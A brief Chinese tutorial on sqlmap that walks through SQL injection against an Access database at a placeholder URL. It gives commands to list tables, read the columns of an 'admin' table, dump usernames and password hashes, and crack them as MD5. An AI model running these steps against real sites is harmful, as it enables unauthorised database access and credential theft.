Sqlmap的基本使用(一)
Access数据库的注入
测试注入点:http://aaa.com/view.asp?id=1
基础指令 -u指令:在后面添加url
例如:sqlmap.py –u “http://aaa.com/view.asp?id=1” 通常加上双引号,避免多指令或者url过于复杂而引发的错误。
扩展:SQLMap的默认输出路径是在 C:/Users/用户名/.sqlmap/output/下的,一般在扫描网站后自动创建,如果不在也可以用以下命令自己改变默认的文件输出路径C:\Python27\sqlmap>sqlmap.py -u “http://aaa.com” --output-dir=C:\Python27\sqlmap\abcabc
第一步:当测试注入点后,测试成功。假设已知数据库是access数据库,接着要查询数据库中的表,命令如下:sqlmap.py –u “http://aaa.com/view.asp?id=1” --tables
注1:当需要判定选项时,直接回车的选项就是当前选项中大写字母为默认选项
注2:每当需要进行数据库注入下一步操作时,在参数中需要定义上一次的指令
tables:列表名 columns:列字段 dump:下载数据
第二步:查询到表明后(如上图)开始查询字:sqlmap.py –u “http://aaa.com/view.asp?id=1” --columns -T “admin” 查询到字段名后
第三步:查询字段的数据sqlmap.py –u “http://aaa.com/view.asp?id=1” - - dump –C “username,passwd” –T “admin”
第四步:查询到用户名和密码后 用MD5解密即可